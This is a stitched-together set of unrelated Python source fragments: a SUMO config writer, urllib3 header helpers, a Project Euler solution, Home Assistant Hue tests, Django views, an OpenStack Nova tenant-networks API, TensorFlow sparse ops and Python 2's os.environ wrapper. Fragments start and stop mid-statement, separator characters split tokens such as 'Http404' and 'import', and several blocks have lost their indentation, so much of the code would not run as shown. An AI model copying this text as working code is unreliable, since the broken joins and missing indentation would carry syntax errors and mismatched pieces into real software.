        <time-to-teleport value="-1"/>
    </processing>
    <report>
        <no-step-log value="true"/>
        <error-log value="logfile.txt"/>
    </report>
    <traci_server>
        <remote-port value="{SUMOport}"/>
    </traci_server>""".format(model=modelname, expPath=exportPath,
                              AVR=int(AVratio * 100), stepSz=stepSize,
                              Nrun=run, SUMOport=port)
    # `print >>` appended a newline after each chunk; replicate that
    # exactly with write(), and close the handle even if a write fails.
    with open(configFile, 'w') as configXML:
        configXML.write(body + "\n")
        configXML.write("</configuration>\n")
|
from __future__ import absolute_import
from base64 import b64encode
from ..packages.six import b
ACCEPT_ENCODING = 'gzip,deflate'


def make_headers(keep_alive=None, accept_encoding=None, user_agent=None,
                 basic_auth=None, proxy_basic_auth=None, disable_cache=None):
    """
    Shortcuts for generating request headers.
    :param keep_alive:
        If ``True``, adds 'connection: keep-alive' header.
    :param accept_encoding:
        Can be a boolean, list, or string.
        ``True`` translates to 'gzip,deflate'.
        List will get joined by comma.
        String will be used as provided.
    :param user_agent:
        String representing the user-agent you want, such as
        "python-urllib3/0.6"
    :param basic_auth:
        Colon-separated username:password string for 'authorization: basic ...'
        auth header.
    :param proxy_basic_auth:
        Colon-separated username:password string for 'proxy-authorization: basic ...'
        auth header.
    :param disable_cache:
        If ``True``, adds 'cache-control: no-cache' header.
    Example::
        >>> make_headers(keep_alive=True, user_agent="Batman/1.0")
        {'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
        >>> make_headers(accept_encoding=True)
        {'accept-encoding': 'gzip,deflate'}
    """
    headers = {}
    if accept_encoding:
        # Lists are comma-joined; strings pass through; anything else
        # truthy (e.g. True) selects the default encodings.
        if isinstance(accept_encoding, list):
            accept_encoding = ','.join(accept_encoding)
        elif not isinstance(accept_encoding, str):
            accept_encoding = ACCEPT_ENCODING
        headers['accept-encoding'] = accept_encoding
    if user_agent:
        headers['user-agent'] = user_agent
    if keep_alive:
        headers['connection'] = 'keep-alive'
    if basic_auth:
        headers['authorization'] = 'Basic ' + \
            b64encode(b(basic_auth)).decode('utf-8')
    if proxy_basic_auth:
        headers['proxy-authorization'] = 'Basic ' + \
            b64encode(b(proxy_basic_auth)).decode('utf-8')
    if disable_cache:
        headers['cache-control'] = 'no-cache'
    return headers
|
'''
Problem 2
@author: Kevin Ji
'''
def sum_even_fibonacci( max_value ):
    """Sum the even Fibonacci numbers strictly below max_value.

    Fixes two boundary defects in the original: the seed term 2 was
    counted even when max_value <= 2, and a term reached by the final
    loop step was added even when it was >= max_value (e.g. the original
    returned 10 for max_value=8 instead of 2).
    """
    prev_term = 1
    cur_term = 2
    # Count the seed even term only when it is below the limit, matching
    # the strict `< max_value` bound applied to every later term.
    temp_sum = 2 if cur_term < max_value else 0
    while cur_term < max_value:
        next_term = prev_term + cur_term
        prev_term = cur_term
        cur_term = next_term
        if cur_term % 2 == 0 and cur_term < max_value:
            temp_sum += cur_term
    return temp_sum
print( sum_even_fibonacci( 4000000 ) )
|
import pytest

from homeassistant import config_entries
from homeassistant.components import hue
from homeassistant.setup import async_setup_component

from tests.async_mock import AsyncMock, Mock, patch
from tests.common import MockConfigEntry
@pytest.fixture
def mock_bridge_setup():
    """Yield a mocked HueBridge whose async_setup resolves True and whose
    api.config reports bridge id "mock-id"."""
    with patch.object(hue, "HueBridge") as mock_bridge:
        mock_bridge.return_value.async_setup = AsyncMock(return_value=True)
        mock_bridge.return_value.api.config = Mock(bridgeid="mock-id")
        yield mock_bridge.return_value
async def test_setup_with_no_config(hass):
    """Empty configuration starts no flows and stores no bridge configs."""
    setup_ok = await async_setup_component(hass, hue.DOMAIN, {})
    assert setup_ok is True
    # Nothing discovered: no config flows in progress.
    flows_in_progress = hass.config_entries.flow.async_progress()
    assert len(flows_in_progress) == 0
    # And no per-host configs stored for the domain.
    assert hass.data[hue.DOMAIN] == {}
async def test_setup_defined_hosts_known_auth(hass):
    """Test we don't initiate a config entry if config bridge is known."""
    # 0.0.0.0 already has a config entry; only 1.1.1.1 is new.
    MockConfigEntry(domain="hue", data={"host": "0.0.0.0"}).add_to_hass(hass)
    with patch.object(hue, "async_setup_entry", return_value=True):
        assert (
            await async_setup_component(
                hass,
                hue.DOMAIN,
                {
                    hue.DOMAIN: {
                        hue.CONF_BRIDGES: [
                            {
                                hue.CONF_HOST: "0.0.0.0",
                                hue.CONF_ALLOW_HUE_GROUPS: False,
                                hue.CONF_ALLOW_UNREACHABLE: True,
                            },
                            {hue.CONF_HOST: "1.1.1.1"},
                        ]
                    }
                },
            )
            is True
        )
    # Flow started for discovered bridge (only one flow: the known
    # 0.0.0.0 host must not start a second one).
    assert len(hass.config_entries.flow.async_progress()) == 1
    # Config stored for domain.
    assert hass.data[hue.DATA_CONFIGS] == {
        "0.0.0.0": {
            hue.CONF_HOST: "0.0.0.0",
            hue.CONF_ALLOW_HUE_GROUPS: False,
            hue.CONF_ALLOW_UNREACHABLE: True,
        },
        "1.1.1.1": {hue.CONF_HOST: "1.1.1.1"},
    }
async def test_setup_defined_hosts_no_known_auth(hass):
    """Test we initiate config entry if config bridge is not known."""
    # Note: CONF_BRIDGES is given here as a single mapping (one bridge)
    # rather than a list, exercising that config shape.
    assert (
        await async_setup_component(
            hass,
            hue.DOMAIN,
            {
                hue.DOMAIN: {
                    hue.CONF_BRIDGES: {
                        hue.CONF_HOST: "0.0.0.0",
                        hue.CONF_ALLOW_HUE_GROUPS: False,
                        hue.CONF_ALLOW_UNREACHABLE: True,
                    }
                }
            },
        )
        is True
    )
    # Flow started for discovered bridge
    assert len(hass.config_entries.flow.async_progress()) == 1
    # Config stored for domain.
    assert hass.data[hue.DATA_CONFIGS] == {
        "0.0.0.0": {
            hue.CONF_HOST: "0.0.0.0",
            hue.CONF_ALLOW_HUE_GROUPS: False,
            hue.CONF_ALLOW_UNREACHABLE: True,
        }
    }
async def test_config_passed_to_config_entry(hass):
    """Test that configured options for a host are loaded via config entry."""
    entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
    entry.add_to_hass(hass)
    mock_registry = Mock()
    with patch.object(hue, "HueBridge") as mock_bridge, patch(
        "homeassistant.helpers.device_registry.async_get_registry",
        return_value=mock_registry,
    ):
        mock_bridge.return_value.async_setup = AsyncMock(return_value=True)
        mock_bridge.return_value.api.config = Mock(
            mac="mock-mac",
            bridgeid="mock-bridgeid",
            modelid="mock-modelid",
            swversion="mock-swversion",
        )
        # Can't set name via kwargs (Mock() reserves `name` for the mock
        # itself), so assign it afterwards.
        mock_bridge.return_value.api.config.name = "mock-name"
        assert (
            await async_setup_component(
                hass,
                hue.DOMAIN,
                {
                    hue.DOMAIN: {
                        hue.CONF_BRIDGES: {
                            hue.CONF_HOST: "0.0.0.0",
                            hue.CONF_ALLOW_HUE_GROUPS: False,
                            hue.CONF_ALLOW_UNREACHABLE: True,
                        }
                    }
                },
            )
            is True
        )
    assert len(mock_bridge.mock_calls) == 2
    # mock_calls[0][1] is the positional-args tuple of the first
    # HueBridge(...) call: (hass, config_entry).
    p_hass, p_entry = mock_bridge.mock_calls[0][1]
    assert p_hass is hass
    assert p_entry is entry
    assert len(mock_registry.mock_calls) == 1
    # mock_calls[0][2] is the kwargs dict of the registry call.
    assert mock_registry.mock_calls[0][2] == {
        "config_entry_id": entry.entry_id,
        "connections": {("mac", "mock-mac")},
        "identifiers": {("hue", "mock-bridgeid")},
        "manufacturer": "Signify",
        "name": "mock-name",
        "model": "mock-modelid",
        "sw_version": "mock-swversion",
    }
async def test_unload_entry(hass, mock_bridge_setup):
    """A set-up entry can be unloaded, resetting the bridge and clearing data."""
    config_entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
    config_entry.add_to_hass(hass)
    assert await async_setup_component(hass, hue.DOMAIN, {}) is True
    assert len(mock_bridge_setup.mock_calls) == 1
    # Give the mocked bridge an awaitable reset so unload can call it.
    mock_bridge_setup.async_reset = AsyncMock(return_value=True)
    assert await hue.async_unload_entry(hass, config_entry)
    assert len(mock_bridge_setup.async_reset.mock_calls) == 1
    assert hass.data[hue.DOMAIN] == {}
async def test_setting_unique_id(hass, mock_bridge_setup):
    """An entry without a unique ID receives the bridge's ID on setup."""
    config_entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
    config_entry.add_to_hass(hass)
    setup_ok = await async_setup_component(hass, hue.DOMAIN, {})
    assert setup_ok is True
    assert config_entry.unique_id == "mock-id"
async def test_fixing_unique_id_no_other(hass, mock_bridge_setup):
    """A wrong unique ID is corrected when no other entry claims the real one."""
    config_entry = MockConfigEntry(
        domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id"
    )
    config_entry.add_to_hass(hass)
    setup_ok = await async_setup_component(hass, hue.DOMAIN, {})
    assert setup_ok is True
    assert config_entry.unique_id == "mock-id"
async def test_fixing_unique_id_other_ignored(hass, mock_bridge_setup):
    """Test we set unique ID if not set yet.

    An *ignored* entry already holding the correct unique ID must not
    prevent our entry from being fixed, and it gets replaced.
    """
    MockConfigEntry(
        domain=hue.DOMAIN,
        data={"host": "0.0.0.0"},
        unique_id="mock-id",
        source=config_entries.SOURCE_IGNORE,
    ).add_to_hass(hass)
    entry = MockConfigEntry(
        domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id",
    )
    entry.add_to_hass(hass)
    assert await async_setup_component(hass, hue.DOMAIN, {}) is True
    await hass.async_block_till_done()
    assert entry.unique_id == "mock-id"
    # Only our (fixed) entry remains; the ignored one is gone.
    assert hass.config_entries.async_entries() == [entry]
async def test_fixing_unique_id_other_correct(hass, mock_bridge_setup):
    """Test we remove config entry if another one has correct ID."""
    correct_entry = MockConfigEntry(
        domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="mock-id",
    )
    correct_entry.add_to_hass(hass)
    entry = MockConfigEntry(
        domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id",
    )
    entry.add_to_hass(hass)
    assert await async_setup_component(hass, hue.DOMAIN, {}) is True
    await hass.async_block_till_done()
    # The duplicate with the invalid ID is dropped in favour of the
    # pre-existing correct entry.
    assert hass.config_entries.async_entries() == [correct_entry]
async def test_security_vuln_check(hass):
"""Test that we report security vulnerabilities."""
assert await async_setup_component(hass, "persistent_notification", {})
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
config = Mock(bridgeid="", mac="", modelid="BSB002", swversion="1935144020")
config.name = "Hue"
with patch.object(
hue,
"HueBridge",
Mock(
return_value=Mock(
async_setup=AsyncMock(return_value=True), api=Mock(config=config)
)
),
):
assert await async_setup_component(hass, "hue", {})
await hass.async_block_till_done()
state = hass.states.get("persistent_notification.hue_hub_fi |
from django.views.generic.detail import DetailView
from django.shortcuts import render, redirect
from django.http import Htt | p404
from aspc.folio.models import Page
class AttachedPageMixin(object):
    """View mixin that looks up a folio Page by the view's `page_slug`
    attribute and exposes it to templates as `page`."""
    def get_page(self):
        """Return the Page whose slug is self.page_slug, or None if absent."""
        try:
            return Page.objects.get(slug=self.page_slug)
        except Page.DoesNotExist:
            return None
    def get_context_data(self, **kwargs):
        ctx = super(AttachedPageMixin, self).get_context_data(**kwargs)
        ctx['page'] = self.get_page()
        return ctx
def page_view(request, slug_path):
    r'''Render a folio page resolved from a slash-separated slug path.

    slug_path: ^(?P<slug_path>(?:[\w\-\d]+/)+)$

    Each path segment narrows the search to the children of the page
    matched by the previous segment; a missing segment raises Http404.
    '''
    candidates = Page.objects.exclude(managed=True)
    page = None
    for slug in slug_path.rstrip('/').split('/'):
        try:
            page = candidates.get(slug=slug)
        except Page.DoesNotExist:
            raise Http404
        # Descend: the next segment is looked up among this page's children.
        candidates = page.page_set.all()
    return render(request, "folio/page.html", {
        "title": page.title,
        "body": page.body,
        "page": page,
        "active_section": page.path()[0].slug,
    })
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
import netaddr.core as netexc
from oslo.config import cfg
import six
from webob import exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
import nova.network
from nova.openstack.common import log as logging
from nova import quota
CONF = cfg.CONF
CONF.import_opt('enable_network_quota',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('use_neutron_default_nets',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('neutron_default_tenant_id',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('quota_networks',
'nova.api.openstack.compute.contrib.os_tenant_networks')
ALIAS = 'os-tenant-networks'
QUOTAS = quota.QUOTAS
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS)
def network_dict(network):
    # NOTE(danms): `network` may be an object-like mapping coming from
    # neutron with most attributes missing, so every read goes through
    # .get() with a None default to avoid lazy-loading absent fields.
    ident = network.get("uuid") or network.get("id")
    return {"id": ident,
            "cidr": str(network.get("cidr")),
            "label": network.get("label")}
class TenantNetworkController(wsgi.Controller):
    """Controller for per-tenant network CRUD under os-tenant-networks."""
    def __init__(self, network_api=None):
        # NOTE(review): the `network_api` parameter is accepted but
        # ignored -- a fresh nova.network.API() is always constructed.
        # Confirm whether injection was intended.
        self.network_api = nova.network.API()
        self._default_networks = []
    def _refresh_default_networks(self):
        """Re-fetch the shared default networks; log (don't raise) on failure."""
        self._default_networks = []
        if CONF.use_neutron_default_nets == "True":
            try:
                self._default_networks = self._get_default_networks()
            except Exception:
                LOG.exception(_LE("Failed to get default networks"))
    def _get_default_networks(self):
        """Return [{'id': ..., 'label': ...}] for the default tenant's networks."""
        project_id = CONF.neutron_default_tenant_id
        ctx = nova_context.RequestContext(user_id=None,
                                          project_id=project_id)
        networks = {}
        for n in self.network_api.get_all(ctx):
            networks[n['id']] = n['label']
        # Python 2 iteritems(), consistent with the rest of this module.
        return [{'id': k, 'label': v} for k, v in networks.iteritems()]
    @extensions.expected_errors(())
    def index(self, req):
        """List the tenant's networks plus the lazily-cached defaults."""
        context = req.environ['nova.context']
        authorize(context)
        networks = list(self.network_api.get_all(context))
        if not self._default_networks:
            self._refresh_default_networks()
        networks.extend(self._default_networks)
        return {'networks': [network_dict(n) for n in networks]}
    @extensions.expected_errors(404)
    def show(self, req, id):
        """Show a single network; 404 when it does not exist."""
        context = req.environ['nova.context']
        authorize(context)
        try:
            network = self.network_api.get(context, id)
        except exception.NetworkNotFound:
            msg = _("Network not found")
            raise exc.HTTPNotFound(explanation=msg)
        return {'network': network_dict(network)}
    @extensions.expected_errors((403, 404, 409))
    @wsgi.response(202)
    def delete(self, req, id):
        """Delete a network, keeping the network quota usage consistent."""
        context = req.environ['nova.context']
        authorize(context)
        reservation = None
        try:
            if CONF.enable_network_quota:
                reservation = QUOTAS.reserve(context, networks=-1)
        except Exception:
            # Best effort: a failed quota reservation must not block delete.
            reservation = None
            LOG.exception(_LE("Failed to update usages deallocating "
                              "network."))
        def _rollback_quota(reservation):
            # Undo the -1 reservation when the delete itself fails.
            if CONF.enable_network_quota and reservation:
                QUOTAS.rollback(context, reservation)
        try:
            self.network_api.delete(context, id)
        except exception.PolicyNotAuthorized as e:
            _rollback_quota(reservation)
            raise exc.HTTPForbidden(explanation=six.text_type(e))
        except exception.NetworkInUse as e:
            _rollback_quota(reservation)
            raise exc.HTTPConflict(explanation=e.format_message())
        except exception.NetworkNotFound:
            _rollback_quota(reservation)
            msg = _("Network not found")
            raise exc.HTTPNotFound(explanation=msg)
        # Commit the quota change only after the delete has succeeded.
        if CONF.enable_network_quota and reservation:
            QUOTAS.commit(context, reservation)
    @extensions.expected_errors((400, 403, 503))
    def create(self, req, body):
        """Create a network from the request body, validating CIDR and quota."""
        if not body:
            _msg = _("Missing request body")
            raise exc.HTTPBadRequest(explanation=_msg)
        context = req.environ["nova.context"]
        authorize(context)
        network = body["network"]
        keys = ["cidr", "cidr_v6", "ipam", "vlan_start", "network_size",
                "num_networks"]
        kwargs = {k: network.get(k) for k in keys}
        label = network["label"]
        if not (kwargs["cidr"] or kwargs["cidr_v6"]):
            msg = _("No CIDR requested")
            raise exc.HTTPBadRequest(explanation=msg)
        if kwargs["cidr"]:
            try:
                net = netaddr.IPNetwork(kwargs["cidr"])
                # Fewer than 4 addresses cannot provide 2+ usable hosts.
                if net.size < 4:
                    msg = _("Requested network does not contain "
                            "enough (2+) usable hosts")
                    raise exc.HTTPBadRequest(explanation=msg)
            except netexc.AddrFormatError:
                msg = _("CIDR is malformed.")
                raise exc.HTTPBadRequest(explanation=msg)
            except netexc.AddrConversionError:
                msg = _("Address could not be converted.")
                raise exc.HTTPBadRequest(explanation=msg)
        networks = []
        try:
            if CONF.enable_network_quota:
                reservation = QUOTAS.reserve(context, networks=1)
        except exception.OverQuota:
            msg = _("Quota exceeded, too many networks.")
            raise exc.HTTPBadRequest(explanation=msg)
        try:
            networks = self.network_api.create(context,
                                               label=label, **kwargs)
            if CONF.enable_network_quota:
                QUOTAS.commit(context, reservation)
        except exception.PolicyNotAuthorized as e:
            raise exc.HTTPForbidden(explanation=six.text_type(e))
        except Exception:
            if CONF.enable_network_quota:
                QUOTAS.rollback(context, reservation)
            msg = _("Create networks failed")
            LOG.exception(msg, extra=network)
            raise exc.HTTPServiceUnavailable(explanation=msg)
        return {"network": network_dict(networks[0])}
class TenantNetworks(extensions.V3APIExtensionBase):
    """Tenant-based Network Management Extension."""
    name = "TenantNetworks"
    alias = ALIAS
    version = 1
    def get_resources(self):
        # Expose the tenant-networks controller under the extension alias.
        return [extensions.ResourceExtension(ALIAS, TenantNetworkController())]
    def get_controller_extensions(self):
        # This extension contributes no controller extensions.
        return []
def _sync_networks(context, project_id, session):
    """Quota sync helper: count the networks visible to `project_id`."""
    elevated_ctx = nova_context.RequestContext(
        user_id=None, project_id=project_id).elevated()
    return {'networks': len(nova.network.api.API().get_all(elevated_ctx))}
if CONF.enable_network_quota:
QUOTAS.register_resource(quota.ReservableResource('networks',
_sync_networks,
'quota_networks' |
# Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Geometry module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=g-im | port-not-at-top
from tensorflow_graphics.util.doc i | mport _import_tfg_docs
if _import_tfg_docs():
from tensorflow_graphics.geometry import convolution
from tensorflow_graphics.geometry import deformation_energy
from tensorflow_graphics.geometry import representation
from tensorflow_graphics.geometry import transformation
from tensorflow_graphics.util import export_api as _export_api
# API contains submodules of tensorflow_graphics.geometry.
__all__ = _export_api.get_modules()
# pylint: enable=g-import-not-at-top
|
#!/bin/python2
# Script that replies to username mentions.
import time
import os
import cPickle
im | port sys
import traceback
import numpy
import sys
from PIL import Image
from urlparse import urlparse
import gabenizer
IMG = "http://i.4cdn.org/r9k/1463377581531.jpg"
def main():
    """Gabenize the image named by the first CLI argument.

    Reads the source image path/URL from sys.argv[1], overlays the
    gabenface template on it and writes the result into the plugin
    directory.
    """
    if len(sys.argv) < 2:
        # Fail with a usage message instead of an IndexError traceback.
        sys.exit("usage: %s <image-url-or-path>" % sys.argv[0])
    image = gabenizer.process_image(sys.argv[1], './plugins/gabenizer/gabenface.png')
    image.save("./plugins/gabenizer/whatfuck.png")
if __name__ == "__main__":
    main()
|
nputs]
shapes = [sp_input.dense_shape for sp_input in sp_inputs]
if expand_nonconcat_dim:
max_shape = math_ops.reduce_max(
array_ops.concat(
[array_ops.reshape(shape, [ | 1, -1]) for shape in shapes], 0), 0)
shapes = [
array_ops.concat([
max_sha | pe[:axis], shape[-1:]
if axis == -1 else shape[axis:axis + 1], []
if axis == -1 else max_shape[axis + 1:]
], 0) for shape in shapes
]
output_ind, output_val, output_shape = (
gen_sparse_ops.sparse_concat(inds, vals, shapes, axis, name=name))
return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
@tf_export("sparse_add")
def sparse_add(a, b, thresh=0):
  """Adds two tensors, at least one of each is a `SparseTensor`.
  If one `SparseTensor` and one `Tensor` are passed in, returns a `Tensor`. If
  both arguments are `SparseTensor`s, this returns a `SparseTensor`. The order
  of arguments does not matter. Use vanilla `tf.add()` for adding two dense
  `Tensor`s.
  The shapes of the two operands must match: broadcasting is not supported.
  The indices of any input `SparseTensor` are assumed ordered in standard
  lexicographic order. If this is not the case, before this step run
  `SparseReorder` to restore index ordering.
  If both arguments are sparse, we perform "clipping" as follows. By default,
  if two values sum to zero at some index, the output `SparseTensor` would still
  include that particular location in its index, storing a zero in the
  corresponding value slot. To override this, callers can specify `thresh`,
  indicating that if the sum has a magnitude strictly smaller than `thresh`, its
  corresponding value and index would then not be included. In particular,
  `thresh == 0.0` (default) means everything is kept and actual thresholding
  happens only for a positive value.
  For example, suppose the logical sum of two sparse operands is (densified):
  [       2]
  [.1     0]
  [ 6   -.2]
  Then,
  * `thresh == 0` (the default): all 5 index/value pairs will be returned.
  * `thresh == 0.11`: only .1 and 0 will vanish, and the remaining three
      index/value pairs will be returned.
  * `thresh == 0.21`: .1, 0, and -.2 will vanish.
  Args:
    a: The first operand; `SparseTensor` or `Tensor`.
    b: The second operand; `SparseTensor` or `Tensor`. At least one operand
      must be sparse.
    thresh: A 0-D `Tensor`. The magnitude threshold that determines if an
      output value/index pair takes space. Its dtype should match that of the
      values if they are real; if the latter are complex64/complex128, then the
      dtype should be float32/float64, correspondingly.
  Returns:
    A `SparseTensor` or a `Tensor`, representing the sum.
  Raises:
    TypeError: If both `a` and `b` are `Tensor`s. Use `tf.add()` instead.
  """
  # Accept both SparseTensor and its value counterpart for either operand.
  sparse_classes = (sparse_tensor.SparseTensor, sparse_tensor.SparseTensorValue)
  if not any(isinstance(inp, sparse_classes) for inp in [a, b]):
    raise TypeError("At least one input should be SparseTensor; do you mean to"
                    " use tf.add()?")
  if all(isinstance(inp, sparse_classes) for inp in [a, b]):
    # sparse + sparse: use the sparse_add kernel with thresholding.
    a = _convert_to_sparse_tensor(a)
    b = _convert_to_sparse_tensor(b)
    # thresh compares magnitudes, so it always uses the real dtype.
    thresh = ops.convert_to_tensor(
        thresh, dtype=a.values.dtype.real_dtype.base_dtype, name="thresh")
    output_ind, output_val, output_shape = (
        gen_sparse_ops.sparse_add(a.indices, a.values, a.dense_shape,
                                  b.indices, b.values, b.dense_shape, thresh))
    # Attempt to get output_shape statically.
    a.get_shape().assert_is_compatible_with(b.get_shape())
    static_shape = array_ops.broadcast_static_shape(a.get_shape(),
                                                    b.get_shape())
    if static_shape.is_fully_defined():
      output_shape = static_shape.as_list()
    return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
  else:
    # sparse + dense: the kernel expects the sparse operand first.
    # swap to make `a` the SparseTensor.
    if isinstance(b, sparse_classes):
      a, b = b, a
    return gen_sparse_ops.sparse_tensor_dense_add(a.indices, a.values,
                                                  a.dense_shape, b)
def _sparse_cross(inputs, name=None):
  """Crosses a list of sparse and dense tensors into string combinations.

  For every row, one value is taken from each input and the values are
  joined with '_X_'.  E.g. with row values ("a", "d", "f") across three
  inputs the output value for that row is "a_X_d_X_f".

  Args:
    inputs: An iterable of `Tensor` or `SparseTensor`.
    name: Optional name for the op.

  Returns:
    A `SparseTensor` of type `string`.
  """
  return _sparse_cross_internal(
      inputs=inputs, hashed_output=False, num_buckets=0, hash_key=None,
      name=name)
def _sparse_cross_hashed(inputs, num_buckets=0, hash_key=None, name=None):
  """Crosses a list of sparse and dense tensors into int64 fingerprints.

  Like `_sparse_cross`, but each crossed combination is folded with
  `FingerprintCat64` into a single int64 value instead of a joined string,
  and the result is taken modulo `num_buckets` when `num_buckets > 0`.

  Args:
    inputs: An iterable of `Tensor` or `SparseTensor`.
    num_buckets: An `int` that is `>= 0`.
      output = hashed_value%num_buckets if num_buckets > 0 else hashed_value.
    hash_key: Integer hash_key used by `FingerprintCat64`; a default key is
      used when not given.
    name: Optional name for the op.

  Returns:
    A `SparseTensor` of type `int64`.
  """
  return _sparse_cross_internal(
      inputs=inputs,
      hashed_output=True,
      num_buckets=num_buckets,
      hash_key=hash_key,
      name=name)
_DEFAULT_HASH_KEY = 0xDECAFCAFFE
def _sparse_cross_internal(inputs,
                           hashed_output=False,
                           num_buckets=0,
                           hash_key=None,
                           name=None):
  """Shared implementation of `_sparse_cross`/`_sparse_cross_hashed`.

  See gen_sparse_ops.sparse_cross.
  """
  if not isinstance(inputs, list):
    raise TypeError("Inputs must be a list")
  for inp in inputs:
    if not isinstance(inp, (sparse_tensor.SparseTensor, ops.Tensor)):
      raise TypeError("All inputs must be SparseTensors")
  sparse_inputs = [inp for inp in inputs
                   if isinstance(inp, sparse_tensor.SparseTensor)]
  dense_inputs = [inp for inp in inputs
                  if not isinstance(inp, sparse_tensor.SparseTensor)]
  indices = [sp.indices for sp in sparse_inputs]
  values = [sp.values for sp in sparse_inputs]
  shapes = [sp.dense_shape for sp in sparse_inputs]
  # Hashed crosses emit int64 fingerprints; plain crosses emit strings.
  out_type = dtypes.int64 if hashed_output else dtypes.string
  internal_type = dtypes.string
  # Any non-string input is crossed as int64 internally.
  for idx, value in enumerate(values):
    if value.dtype != dtypes.string:
      values[idx] = math_ops.to_int64(value)
      internal_type = dtypes.int64
  for idx, dense in enumerate(dense_inputs):
    if dense.dtype != dtypes.string:
      dense_inputs[idx] = math_ops.to_int64(dense)
      internal_type = dtypes.int64
  indices_out, values_out, shape_out = gen_sparse_ops.sparse_cross(
      indices=indices,
      values=values,
      shapes=shapes,
      dense_inputs=dense_inputs,
      hashed_output=hashed_output,
      num_buckets=num_buckets,
      hash_key=hash_key or _DEFAULT_HASH_KEY,
      out_type=out_type,
      internal_type=internal_type,
      name=name)
  return sparse_tensor.SparseTensor(indices_out, values_out, shape_out)
def sparse_dense_cwise_add( |
# Change environ to automatically call putenv() if it exists
try:
    # This will fail if there's no putenv
    putenv
except NameError:
    pass
else:
    import UserDict
    # Fake unsetenv() for Windows
    # not sure about os2 here but
    # I'm guessing they are the same.
    if name in ('os2', 'nt'):
        def unsetenv(key):
            # Best-effort: setting to "" is the closest these platforms offer.
            putenv(key, "")
    if name == "riscos":
        # On RISC OS, all env access goes through getenv and putenv
        from riscosenviron import _Environ
    elif name in ('os2', 'nt'): # Where Env Var Names Must Be UPPERCASE
        # But we store them as upper case
        # Mapping that mirrors every write through putenv() so the process
        # environment and this dict stay in sync; keys are stored upper-cased
        # because the platform treats names case-insensitively.
        class _Environ(UserDict.IterableUserDict):
            def __init__(self, environ):
                UserDict.UserDict.__init__(self)
                data = self.data
                for k, v in environ.items():
                    data[k.upper()] = v
            def __setitem__(self, key, item):
                putenv(key, item)
                self.data[key.upper()] = item
            def __getitem__(self, key):
                return self.data[key.upper()]
            # Pick the right __delitem__/clear/pop at class-build time,
            # depending on whether unsetenv() exists on this platform.
            try:
                unsetenv
            except NameError:
                def __delitem__(self, key):
                    del self.data[key.upper()]
            else:
                def __delitem__(self, key):
                    unsetenv(key)
                    del self.data[key.upper()]
                def clear(self):
                    # Keys are already stored upper-cased here.
                    for key in self.data.keys():
                        unsetenv(key)
                        del self.data[key]
                def pop(self, key, *args):
                    unsetenv(key)
                    return self.data.pop(key.upper(), *args)
            def has_key(self, key):
                return key.upper() in self.data
            def __contains__(self, key):
                return key.upper() in self.data
            def get(self, key, failobj=None):
                return self.data.get(key.upper(), failobj)
            def update(self, dict=None, **kwargs):
                if dict:
                    try:
                        keys = dict.keys()
                    except AttributeError:
                        # List of (key, value)
                        for k, v in dict:
                            self[k] = v
                    else:
                        # got keys
                        # cannot use items(), since mappings
                        # may not have them.
                        for k in keys:
                            self[k] = dict[k]
                if kwargs:
                    self.update(kwargs)
            def copy(self):
                return dict(self)
    else: # Where Env Var Names Can Be Mixed Case
        # Case-preserving variant: writes still go through putenv().
        class _Environ(UserDict.IterableUserDict):
            def __init__(self, environ):
                UserDict.UserDict.__init__(self)
                self.data = environ
            def __setitem__(self, key, item):
                putenv(key, item)
                self.data[key] = item
            def update(self, dict=None, **kwargs):
                if dict:
                    try:
                        keys = dict.keys()
                    except AttributeError:
                        # List of (key, value)
                        for k, v in dict:
                            self[k] = v
                    else:
                        # got keys
                        # cannot use items(), since mappings
                        # may not have them.
                        for k in keys:
                            self[k] = dict[k]
                if kwargs:
                    self.update(kwargs)
            # Deletion helpers only when unsetenv() exists on this platform.
            try:
                unsetenv
            except NameError:
                pass
            else:
                def __delitem__(self, key):
                    unsetenv(key)
                    del self.data[key]
                def clear(self):
                    for key in self.data.keys():
                        unsetenv(key)
                        del self.data[key]
                def pop(self, key, *args):
                    unsetenv(key)
                    return self.data.pop(key, *args)
            def copy(self):
                return dict(self)
    # Replace the plain dict with the putenv-aware wrapper.
    environ = _Environ(environ)
def getenv(key, default=None):
    """Get an environment variable, return None if it doesn't exist.
    The optional second argument can specify an alternate default."""
    # Thin convenience wrapper over the environ mapping defined above.
    return environ.get(key, default)
__all__.append("getenv")
def _exists(name):
try:
eval(name)
return True
except NameError:
return False
# Supply spawn*() (probably only for Unix)
